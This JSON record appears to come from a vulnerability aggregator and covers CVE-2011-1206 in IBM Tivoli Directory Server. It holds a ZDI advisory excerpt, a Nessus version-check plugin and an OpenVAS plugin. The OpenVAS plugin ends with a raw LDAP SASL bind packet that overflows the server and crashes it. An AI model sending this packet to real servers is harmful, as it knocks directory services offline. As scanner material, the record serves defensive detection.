Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Francis Provencher for Protek Research Lab's\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "modified": "2011-04-19T00:00:00", "published": "2011-04-19T00:00:00", "id": "SECURITYVULNS:DOC:26162", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26162", "title": "ZDI-11-136: IBM Tivoli Directory Server ibmslapd.exe SASL Bind Request Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-11-03T12:30:16", "bulletinFamily": "scanner", "description": "According to its version, the installation of IBM Tivoli Directory\nServer on the remote host is prior to 6.0.0.67, 6.1.0.40, 6.2.0.16, or\n6.3.0.3. It is, therefore, affected by one or more of the following\nvulnerabilities :\n\n - A malicious LDAP request can cause a buffer overrun in\n the server, allowing an unauthenticated, remote attacker\n to execute arbitrary code within Tivoli Directory\n Server", "modified": "2019-11-02T00:00:00", "id": "TIVOLI_DIRECTORY_SVR_6303.NASL", "href": "https://www.tenable.com/plugins/nessus/53625", "published": "2011-05-02T00:00:00", "title": "IBM Tivoli Directory Server Vulnerabilities (credentialed check)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(53625);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\n\n script_cve_id(\"CVE-2011-1206\");\n script_bugtraq_id(47121);\n\n script_name(english:\"IBM Tivoli Directory Server Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks the version of Tivoli Directory Server.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The version of IBM Tivoli Directory Server installed on the remote\nhost contains multiple security vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its version, the installation of IBM Tivoli Directory\nServer on the remote host is prior to 6.0.0.67, 6.1.0.40, 6.2.0.16, or\n6.3.0.3. It is, therefore, affected by one or more of the following\nvulnerabilities :\n\n - A malicious LDAP request can cause a buffer overrun in\n the server, allowing an unauthenticated, remote attacker\n to execute arbitrary code within Tivoli Directory\n Server's server process. This vulnerability has only\n been recreated on 32 bit platforms. (IO14010, IO14013,\n IO14028, IO14046, IO14045)\n\n - A security vulnerability has been identified in Tivoli\n Directory server. If the Server is configured to audit\n extended operations with 'Attributes sent on group\n evaluation extended operation' enabled\n (ibm-auditAttributesOnGroupEvalOp=TRUE), the audit\n entries for the group eval extended op will include\n unmasked values for sensitive data. (IO14023, IO14025,\n IO14028, IO14043, IO14044)\"\n );\n\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1d3972f7\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-11-136/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www-304.ibm.com/support/docview.wss?uid=swg21496117\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www-304.ibm.com/support/docview.wss?uid=swg21496086\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Install the appropriate fix based on the vendor's advisory :\n\n - 6.0.0.8-TIV-ITDS-IF0009\n - 6.1.0.5-TIV-ITDS-IF0003\n - 6.2.0.3-TIV-ITDS-IF0002\n - 6.3.0.0-TIV-ITDS-IF0003\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/04/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/02\");\n \n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ibm:tivoli_directory_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"tivoli_directory_svr_installed.nasl\");\n script_require_keys(\"installed_sw/IBM Security Directory Server\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp = \"IBM Security Directory Server\";\ninstall = get_single_install(app_name:app, exit_if_unknown_ver:TRUE);\n\nversion = install['version'];\npath = install['path'];\n\nfixed = NULL;\npatch = NULL;\n\n# Determine the proper fix given the version number.\n# 6.0 branch : 6.0.0.67\n# 6.1 branch : 6.1.0.40\n# 6.2 branch : 6.2.0.16\n# 6.3 branch : 6.3.0.3\nif (version =~ '^6\\\\.')\n{\n if (version =~ '^6\\\\.0\\\\.' && ver_compare(ver:version, fix:'6.0.0.67') == -1)\n {\n fixed = \"6.0.0.67\";\n patch = \"6.0.0.8-TIV-ITDS-IF0009\";\n }\n else if (version =~ '^6\\\\.1\\\\.' && ver_compare(ver:version, fix:'6.1.0.40') == -1)\n {\n fixed = \"6.1.0.40\";\n patch = \"6.1.0.5-TIV-ITDS-IF0003\";\n }\n else if (version =~ '^6\\\\.2\\\\.' && ver_compare(ver:version, fix:'6.2.0.16') == -1)\n {\n fixed = \"6.2.0.16\";\n patch = \"6.2.0.3-TIV-ITDS-IF0002\";\n }\n else if (version =~ '^6\\\\.3\\\\.' && ver_compare(ver:version, fix:'6.3.0.3') == -1)\n {\n fixed = \"6.3.0.3\";\n patch = \"6.3.0.0-TIV-ITDS-IF0003\";\n }\n}\n\nif (isnull(fixed))\n audit(AUDIT_INST_PATH_NOT_VULN, 'IBM Tivoli Directory Server', version, path);\n\nport = get_kb_item(\"SMB/transport\");\nif (!port) port = 445;\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed +\n '\\n' +\n '\\n Install ' + patch + ' to update installation.' +\n '\\n';\n\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:39:24", "bulletinFamily": "scanner", "description": "The host is running IBM Tivoli Directory Server and is prone\n to remote code execution vulnerability.", "modified": "2018-10-19T00:00:00", "published": "2011-05-02T00:00:00", "id": "OPENVAS:1361412562310902507", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902507", "title": "IBM Tivoli Directory Server SASL Bind Request Remote Code Execution Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ibm_tivoli_dir_server_code_exec_vuln.nasl 11987 2018-10-19 11:05:52Z mmartin $\n#\n# IBM Tivoli Directory Server SASL Bind Request Remote Code Execution Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902507\");\n script_version(\"$Revision: 11987 $\");\n script_cve_id(\"CVE-2011-1206\", \"CVE-2011-1820\");\n script_bugtraq_id(47121);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-19 13:05:52 +0200 (Fri, 19 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-02 12:20:04 +0200 (Mon, 02 May 2011)\");\n script_name(\"IBM Tivoli Directory Server SASL Bind Request Remote Code Execution Vulnerability\");\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"ldap_detect.nasl\");\n script_require_ports(\"Services/ldap\", 389, 636);\n script_mandatory_keys(\"ldap/detected\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/44184\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/id?1025358\");\n script_xref(name:\"URL\", value:\"http://www.1337day.com/exploits/15889\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/17188/\");\n script_xref(name:\"URL\", value:\"https://www-304.ibm.com/support/docview.wss?uid=swg24029672\");\n script_xref(name:\"URL\", value:\"https://www-304.ibm.com/support/docview.wss?uid=swg24029663\");\n script_xref(name:\"URL\", value:\"https://www-304.ibm.com/support/docview.wss?uid=swg24029661\");\n script_xref(name:\"URL\", value:\"https://www-304.ibm.com/support/docview.wss?uid=swg24029660\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to execute arbitrary\n code within the context of the affected application or retrieve potentially\n sensitive information.\");\n script_tag(name:\"affected\", value:\"IBM Tivoli Directory Server 5.2 before 5.2.0.5-TIV-ITDS-IF0010,\n 6.0 before 6.0.0.67 (6.0.0.8-TIV-ITDS-IF0009),\n 6.1 before 6.1.0.40 (6.1.0.5-TIV-ITDS-IF0003),\n 6.2 before 6.2.0.16 (6.2.0.3-TIV-ITDS-IF0002),\n and 6.3 before 6.3.0.3\");\n script_tag(name:\"insight\", value:\"The flaw is caused by a stack overflow error in the 'ibmslapd.exe' component\n when allocating a buffer via the 'ber_get_int()' function within\n 'libibmldap.dll' while handling LDAP CRAM-MD5 packets, which could be\n exploited by remote unauthenticated attackers to execute arbitrary code with\n SYSTEM privileges.\");\n script_tag(name:\"solution\", value:\"Apply Vendor patches.\");\n script_tag(name:\"summary\", value:\"The host is running IBM Tivoli Directory Server and is prone\n to remote code execution vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"ldap.inc\");\n\nport = get_ldap_port( default:389 );\n\nif(! ldap_alive(port:port)){\n exit(0);\n}\n\n## LDAP SASL Bind Request\ndata = raw_string(0x30, 0x18, 0x02, 0x01, 0x01, 0x60, 0x13, 0x02,\n 0x01, 0x03, 0x04, 0x00, 0xa3, 0x0c, 0x04, 0x08,\n 0x43, 0x52, 0x41, 0x4d, 0x2d, 0x4d, 0x44, 0x35,\n 0x04, 0x00);\n\nattack = raw_string(0x30, 0x82, 0x01, 0x41, 0x02, 0x01, 0x02, 0x60,\n 0x82, 0x01, 0x3a, 0x02, 0x01, 0x03, 0x04, 0x00,\n 0xa3, 0x82, 0x01, 0x31, 0x04, 0x08, 0x43, 0x52,\n 0x41, 0x4d, 0x2d, 0x4d, 0x44, 0x35, 0x04, 0x84,\n 0xff, 0xff, 0xff, 0xff) +\n crap(data:raw_string(0x41), length: 256) +\n raw_string(0x20, 0x36, 0x61, 0x37, 0x61, 0x31, 0x31, 0x34,\n 0x39, 0x36, 0x30, 0x33, 0x61, 0x64, 0x37, 0x64,\n 0x30, 0x33, 0x34, 0x39, 0x35, 0x66, 0x39, 0x65,\n 0x37, 0x31, 0x34, 0x66, 0x34, 0x30, 0x66, 0x31,\n 0x63);\n\nsoc = open_sock_tcp(port);\nif(! soc){\n exit(0);\n}\n\n## Sending Exploit\nsend(socket:soc, data:data);\nres = recv(socket:soc, length:128);\nsend(socket:soc, data:attack);\nres = recv(socket:soc, length:128);\n\nif(! ldap_alive(port:port)){\n security_message(port);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
